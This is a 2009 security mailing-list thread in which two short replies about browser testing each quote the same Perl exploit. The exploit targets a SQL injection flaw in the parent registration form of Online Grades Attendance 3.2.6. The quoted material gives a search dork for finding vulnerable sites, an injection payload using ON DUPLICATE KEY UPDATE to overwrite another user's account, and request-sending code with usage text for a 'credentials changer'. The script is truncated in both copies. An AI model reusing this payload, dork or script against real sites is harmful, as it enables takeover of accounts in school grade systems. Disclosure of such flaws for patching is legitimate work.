Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Why do you include TESTED ON: firefox 3? Would you not be able to trigger this bug using other browsers? On Sun, May 31, 2009 at 8:53 PM, y3nh4c...@gmail.com wrote: #!/usr/bin/perl #--- #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6-- #--- # #CMS INFORMATION: # #--WEB: http://www.onlinegrades.org/ #--DOWNLOAD: http://www.onlinegrades.org/ #--DEMO: http://www.onlinegrades.org/demo_info #--CATEGORY: CMS / Education #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same # features plus many new features. OG is a web based grade... #--RELEASED: 2009-02-05 # #CMS VULNERABILITY: # #--TESTED ON: firefox 3 #--DORK: Powered by Online Grades #--CATEGORY: SQL INJECTION #--AFFECT VERSION: = 3.2.6 #--Discovered Bug date: 2009-05-21 #--Reported Bug date: 2009-05-21 #--Fixed bug date: Not fixed #--Info patch: Not fixed #--Author: YEnH4ckEr #--mail: y3nh4ck3r[at]gmail[dot]com #--WEB/BLOG: N/A #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # # # #CONDITIONS: # # #gpc_magic_quotes=OFF # #- #PRE-REQUIREMENTS #- # #Option -- Self Registration -- Allowed (Default value) # #--- #NEED: #--- # #Valid parent id # #--- #PROOF OF CONCEPT (SQL INJECTION): #--- # #Register module (name) is vuln to sql injection. # #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'# # #Other parameters -- something # # #Return: Change client_id to 'owned' for parent id=1 # # ### ### ##***## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##***## ##---## ##***## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##***## ### ### # # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ; if (index(lc($SO),win)!=-1){ $linux=0; }else{ $linux=1; } if($linux){ system(clear); } else{ system(cls); system (title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit); system (color 02); } } sub request { my $userag = LWP::UserAgent-new; $userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); if($_[2] eq post){ $request = HTTP::Request - new(POST = $_[0]); $request-referer($_[0]); $request-content_type('application/x-www-form-urlencoded'); $request-content($_[1]); }else{ $request = HTTP::Request - new(GET = $_[0]); } my $outcode= $userag-request($request)-as_string; return $outcode; } sub error { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t---Maybe:\n\n; print \t\t1.-Patched.\n; print \t\t2.-Bad path or host.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub errormagicquotes { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t\tRaison-- Magic quotes ON.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub helper { print \n\t[!!!] Online Grades Attendance = v-3.2.6 (Credentials changer) Exploit\n; print \t[!!!] USAGE MODE: [!!!]\n; print \t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n; print \t[!!!] [HOST]: Web.\n; print \t[!!!] [PATH]: Home Path.\n; print \t[!!!] [Email Address]: Set value\n; print \t[!!!] [Password]: Set value\n; print \t[!!!] [Target_id]: victim id\n
Re: Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Of course not. I include this information to report in details Then...when do you need a browser to launch a perl exploit? Why do you include TESTED ON: firefox 3? Would you not be able to trigger this bug using other browsers? On Sun, May 31, 2009 at 8:53 PM, y3nh4ck3r (at) gmail (dot) com [email concealed] wrote: #!/usr/bin/perl #--- #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6-- #--- # #CMS INFORMATION: # #--WEB: http://www.onlinegrades.org/ #--DOWNLOAD: http://www.onlinegrades.org/ #--DEMO: http://www.onlinegrades.org/demo_info #--CATEGORY: CMS / Education #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same # features plus many new features. OG is a web based grade... #--RELEASED: 2009-02-05 # #CMS VULNERABILITY: # #--TESTED ON: firefox 3 #--DORK: Powered by Online Grades #--CATEGORY: SQL INJECTION #--AFFECT VERSION: = 3.2.6 #--Discovered Bug date: 2009-05-21 #--Reported Bug date: 2009-05-21 #--Fixed bug date: Not fixed #--Info patch: Not fixed #--Author: YEnH4ckEr #--mail: y3nh4ck3r[at]gmail[dot]com #--WEB/BLOG: N/A #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # # # #CONDITIONS: # # #gpc_magic_quotes=OFF # #- #PRE-REQUIREMENTS #- # #Option -- Self Registration -- Allowed (Default value) # #--- #NEED: #--- # #Valid parent id # #--- #PROOF OF CONCEPT (SQL INJECTION): #--- # #Register module (name) is vuln to sql injection. # #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'# # #Other parameters -- something # # #Return: Change client_id to 'owned' for parent id=1 # # ### ### ##***## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##***## ##---## ##***## ## GREETZ TO: SPANISH H4ck3Rs community!## ##***## ### ### # # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ; if (index(lc($SO),win)!=-1){ $linux=0; }else{ $linux=1; } if($linux){ system(clear); } else{ system(cls); system (title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit); system (color 02); } } sub request { my $userag = LWP::UserAgent-new; $userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); if($_[2] eq post){ $request = HTTP::Request - new(POST = $_[0]); $request-referer($_[0]); $request-content_type('application/x-www-form-urlencoded'); $request-content($_[1]); }else{ $request = HTTP::Request - new(GET = $_[0]); } my $outcode= $userag-request($request)-as_string; return $outcode; } sub error { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t---Maybe:\n\n; print \t\t1.-Patched.\n; print \t\t2.-Bad path or host.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub errormagicquotes { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t\tRaison-- Magic quotes ON.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub helper { print \n\t[!!!] Online Grades Attendance = v-3.2.6 (Credentials changer) Exploit\n; print \t[!!!] USAGE MODE: [!!!]\n; print \t